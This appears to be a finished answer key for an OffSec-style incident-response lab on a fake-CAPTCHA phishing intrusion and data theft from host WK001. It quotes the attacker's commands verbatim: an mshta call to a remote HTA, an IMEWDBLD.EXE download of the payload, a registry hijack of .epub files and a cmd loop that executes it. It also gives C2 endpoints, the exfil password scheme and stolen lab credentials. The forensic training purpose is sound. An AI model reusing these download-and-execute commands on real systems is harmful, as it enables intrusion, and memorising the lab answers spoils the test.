Lab Instructions

Download the ZIP package. The password is "Shadow234@".

Thanks to your actions during the ProtoVault incident, you've gained the trust of the Etherians. The OffSec Legend, Cipherflare has called upon you to investigate the breach before more damage is done.

The Etherians offer fragments of evidence, just enough to begin the investigation:

• The user directory of a.smith@megacorpone.com from the machine WK001

• Event logs from WK001

A ZIP archive awaits you.

Uncover the truth hidden in the darkness. Find what was taken, and how.

1. The attackers successfully exfiltrated data from the compromised system. What specific file was exfiltrated and which program was used to carry out the exfiltration? Please also include the SHA-256 hashes, along the filenames, for both the exfiltrated file and the program used.

Exfiltrated file: 101010245WK001_protected.zip SHA-256: 0324d54bc6c0f2dfa54b32bc68c16fd401778c10a9e9780b9cda0f31ae960d9c Program used: captcha_privacy[1].epub SHA-256: a88fedc93a1d80c8cea08fbcb6b001293ddf357e27d268b32c5cfd23a49e96ed Discovery: Found in Sysmon logs (Event ID 23 - File Delete/Archive operation)

2. How was the exfiltration program downloaded and executed on the compromised system? Make sure to specify the tool, script, or method used to download the program, where it was downloaded to, and how it could be executed.

Download method: Malicious HTA using IMEWDBLD.EXE to HTTP-download the payload Download location: User web cache at ...INetCache\IE\66HCZK0X\captcha_privacy[1].epub Execution method: Registry hijack of .epub to exefile, then start command to launch the downloaded .epub as an executable Technical Details: LOLBin abuse of Windows IME Dictionary Builder (IMEWDBLD.EXE) Registry modification allowed .epub files to execute as programs Automated execution via cmd.exe loop searching INetCache

3. Describe how the attackers achieved code execution on the target machine to download and run the exfiltration program (from exercises 1 and 2). Your answer must clearly explain each stage of the attack in chronological order, starting from initial contact and ending with the execution of the downloaded program. Include all relevant technical indicators such as exact URLs, commands, IP addresses, usernames, redirects, payload loading sources, and other IoCs. Be specific about how and where payloads or commands were retrieved, especially if loaded from remote resources.

Stage 1: Initial Contact - Phishing Email Date: August 5, 2025 at 08:35:42 UTC Source IP: 99.91.94.11 Sender: billing@zaffrevelox.com (spoofed as Spamwarriors Filter) Recipient: a.smith@megacorpone.com Subject: "License Renewal Notice" Malicious Link: http://www.zaffrevelox.com

Stage 2: Redirect to Fake CAPTCHA User clicked link which redirected to: https://pfusioncaptcha.com Site presented fake "I'm not a robot" CAPTCHA verification page

Stage 3: Blockchain-Based Payload Delivery JavaScript on pfusioncaptcha.com made eth_call to smart contract: RPC Server: http://31.17.87.96:8545/ Smart Contract: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512 Function Selector: 0x2cae8ae4 Retrieved Base64-encoded command: mshta.exe http://pfusioncaptcha.com/13221442.hta Command automatically copied to clipboard

Stage 4: Social Engineering Execution Page instructed user to: Press Windows+R, Ctrl+V, Enter User executed: "C:\WINDOWS\System32\mshta.exe" http://pfusioncaptcha.com/13221442.hta Time: 2025-08-05 09:01:16 UTC Process ID: 19424

Stage 5: HTA Downloads Malware (LOLBin Abuse) HTA script spawned: "C:\Windows\System32\IME\SHARED\IMEWDBLD.EXE" http://news.axonbyte.org:8000/captcha_privacy.epub DNS Resolution: news.axonbyte.org → 145.1.0.92 Downloaded to: C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache\IE\66HCZK0X\captcha_privacy[1].epub

Stage 6: Registry Hijack HTA modified registry: .epub extension → exefile type

Stage 7: Automated Execution Command: cmd.exe /c for /r "C:\Users\a.smith\AppData\Local\Microsoft\Windows\INetCache" %i in (*.epub) do (start "" "%i" & exit) Executed captcha_privacy[1].epub as malware (PID: 17852) User Context: MEGACORPONE\a.smith on WK001.megacorpone.com (10.10.10.245) Complete IoC List: IPs: 99.91.94.11 (phishing infrastructure) 31.17.87.96 (blockchain RPC server) 145.1.0.92 (C2 server and malware download) URLs: Email: http://www.zaffrevelox.com → Redirect to https://pfusioncaptcha.com HTA: http://pfusioncaptcha.com/13221442.hta Download: http://news.axonbyte.org:8000/captcha_privacy.epub Blockchain: Contract: 0xe7f1725E7734CE288F8367e1Bb143E90bb3F0512 RPC Endpoint: 31.17.87.96:8545

4. Analyze the exfiltration program and identify the endpoints used by the attacker. For each endpoint, provide only the path component (e.g., /test) without parameters, not the full URL, and explain its specific purpose and role in the attack. For example, if the attacker used https://example.com/test to retrieve the C2 configuration, your answer should list /test with an explanation of its function. You must provide at least two valid endpoints with their corresponding explanations.

/life — Heartbeat / status beacon Periodic check-ins from the host: minimal telemetry (host ID, uptime, timestamp, IP) Used to confirm reachability and track alive clients /send_message — Data exfiltration endpoint Uploads collected data or files (supports chunking/resume) Accepts metadata (filename, size, mime) and encrypted payload /receive_message — Command & control pull Client polls for operator instructions: job IDs, commands, execution parameters, and scheduled tasks Responses are short to minimize noise /feed — Covert RSS/Atom channel for config/ops Stealthy distribution channel that looks like a benign RSS feed Used to deliver encrypted configs, staged tasks, or operator signals without direct C2 connections

5. Further analyze the exfiltration program to determine how the exfiltrated data was protected. Your answer must specify the exact encryption algorithm used and explain the full structure of the password, including each of its components and how they are combined.

Encryption Scheme: WinZip AE-2 (AES-256) Keys derived using PBKDF2 with HMAC-SHA1 (1,000 iterations) and per-file salt Data encrypted with AES-256 in CTR mode Authenticated via HMAC-SHA1 ZIP member includes 2-byte password verifier Password Structure: Formula: Machine GUID + Hostname GUID: cc9441e5-1c80-4287-9c7a-4c03215c0969 Hostname: WK001 Password: cc9441e51c8042879c7a4c03215c0969WK001

6. Review the exfiltrated data to identify a specific piece of sensitive information that could enable further compromise of the enterprise infrastructure. Explain from where this sensitive piece of information was stolen and provide it as answer to this exercise. For the latter, make sure to include the compromised accounts, passwords, and all affected services.

Source: Stolen from Chrome browser's saved passwords Compromised Accounts: [ { "origin": "https://portal.azure.com/", "username": "a.smith@megacorpone.com", "password": "ADG135QET246!v!" }, { "origin": "https://accounts.google.com/", "username": "a.smith@megacorpone.com", "password": "ADG135QET246!v!" } ] Impact: These credentials provide access to: Azure Portal (cloud infrastructure) Google Workspace (email, documents, admin access) Password reuse across multiple critical services

7. What IP addresses were involved in the attack chain and can be attributed to the attacker? Make sure to include all IP addresses that the attacker utilized. This includes remote resources that payloads were loaded from. Enter at least 4.

31.17.87.96:8545

145.1.0.92:8000

145.1.0.92:443

99.91.94.11:80